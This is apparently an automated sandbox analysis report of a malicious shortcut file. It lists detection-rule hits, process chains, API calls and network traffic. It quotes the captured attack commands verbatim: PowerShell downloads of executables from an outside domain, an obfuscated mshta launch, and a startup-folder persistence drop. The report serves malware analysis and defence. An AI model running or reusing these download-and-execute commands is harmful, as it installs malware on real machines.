Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8736, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 8788, ProcessName: SwiftWrite.pif
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7508, TargetFilename: C:\Users\user\AppData\Roaming\XKIZdXAs.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" , ParentImage: C:\Users\user\AppData\Roaming\XKIZdXAs.exe, ParentProcessId: 7624, ParentProcessName: XKIZdXAs.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 4268, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XKIZdXAs.exe" , ParentImage: C:\Users\user\AppData\Roaming\XKIZdXAs.exe, ParentProcessId: 7624, ParentProcessName: XKIZdXAs.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/ALGglt" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 4268, ProcessName: powershell.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 8736, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 7716, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghep2412_2'), ProcessId: 7832, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7256, ProcessName: svchost.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8644, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T09:05:26.683305+010028033053Unknown Traffic192.168.2.849711147.45.49.155443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T09:05:34.331279+010018100032Potentially Bad Traffic147.45.49.155443192.168.2.849722TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T09:05:34.077266+010018100001Potentially Bad Traffic192.168.2.849722147.45.49.155443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ghep2412_2[1]ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: n5Szx8qsFB.lnkVirustotal: Detection: 29%Perma Link
Source: n5Szx8qsFB.lnkReversingLabs: Detection: 21%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.1784385085.0000021D206B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764422929.0000021D206C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764242109.0000021D24760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764299436.0000021D2467A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485794840.0000021D24614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1763193876.0000021D2464F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770484123.0000021D20748000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1763663634.0000021D24632000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1762308911.0000021D24614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1784310747.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1762170340.0000021D24760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764056549.0000021D20743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1785367870.0000021D206B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1795443084.0000021D2074C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1762170340.0000021D246C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765703418.0000021D245B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765157834.0000021D206B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768177432.0000021D24591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485863086.0000021D2466D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768320287.0000021D20744000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764299436.0000021D24652000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1763886260.0000021D26241000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764993316.0000021D2467E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1486253359.0000021D2073E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sethc.pdb source: mshta.exe, 00000006.00000003.1784385085.0000021D206B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764299436.0000021D2467A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485794840.0000021D24614000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1785367870.0000021D206B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765703418.0000021D245B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765157834.0000021D206B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1768177432.0000021D24591000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1485863086.0000021D2466D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1764993316.0000021D2467E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC7C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_00007FF7ADC7C7C0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC42F50 FindFirstFileExW,15_2_00007FF7ADC42F50
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC8A874 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_00007FF7ADC8A874
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC8A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,15_2_00007FF7ADC8A4F8
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC86428 FindFirstFileW,FindNextFileW,FindClose,15_2_00007FF7ADC86428
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC8A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,15_2_00007FF7ADC8A350
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC7BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00007FF7ADC7BC70
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC7B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00007FF7ADC7B7C0
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC872A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_00007FF7ADC872A8
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC871F4 FindFirstFileW,FindClose,15_2_00007FF7ADC871F4
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BB4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00BB4005
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BB494A GetFileAttributesW,FindFirstFileW,FindClose,23_2_00BB494A
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BBC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00BBC2FF
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BBCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,23_2_00BBCD9F
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BBCD14 FindFirstFileW,FindClose,23_2_00BBCD14
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BBF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00BBF5D8
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BBF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_00BBF735
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BBFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,23_2_00BBFA36
Source: C:\Users\Public\Guard.exeCode function: 23_2_00BB3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_00BB3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00854005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00854005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085494A GetFileAttributesW,FindFirstFileW,FindClose,27_2_0085494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_0085C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,27_2_0085CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085CD14 FindFirstFileW,FindClose,27_2_0085CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_0085F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,27_2_0085F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_0085FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,27_2_0085FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00853CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00853CE2

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.8:49722 -> 147.45.49.155:443
Source: global trafficHTTP traffic detected: GET /Project_Information.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /XKIZdXAs.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /ZxVMIVZIX.txt HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 147.45.49.155 147.45.49.155
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49711 -> 147.45.49.155:443
Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 147.45.49.155:443 -> 192.168.2.8:49722
Source: global trafficHTTP traffic detected: GET /ghep2412_2 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ALGglt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tiffany-careers.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeCode function: 15_2_00007FF7ADC8E968 InternetQueryDataAvailable,InternetReadFile,15_2_00007FF7ADC8E968
Source: global trafficHTTP traffic detected: GET /ghep2412_2 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Project_Information.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /XKIZdXAs.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /ALGglt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ZxVMIVZIX.txt HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: tiffany-careers.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: svchost.exe, 00000008.00000002.2680973778.000001E22AE85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000009.00000002.1680477076.000002822EA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1932942954.000001E2ABE89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D6B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1443126363.0000019635D86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1608154018.000002821E9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29BE11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2680808644.000000000385F000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000009.00000002.1608154018.000002821F4FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29D43B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D486000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D6B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000017.00000003.1741865813.0000000004623000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2670340333.0000000000C19000.00000002.00000001.01000000.00000010.sdmp, SwiftWrite.pif, 0000001B.00000002.2670257397.00000000008B9000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.23.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000005.00000002.1443126363.0000019635D39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1443126363.0000019635D4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1608154018.000002821E9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1740822897.000001E29BE11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D715000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000008.00000003.1478698710.000001E22B071000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.1478698710.000001E22B000000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000015.00000002.1740822897.000001E29D6B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000015.00000002.1740822897.000001E29CF7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000015.00000002.2022240307.000001E2B455F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.c
Source: mshta.exe, 00000006.00000003.1486287260.000002151DB72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1765184654.000002151DB72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1791096545.000002151DB72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1784031189.000002151DB72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1770561751.000002151DB72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
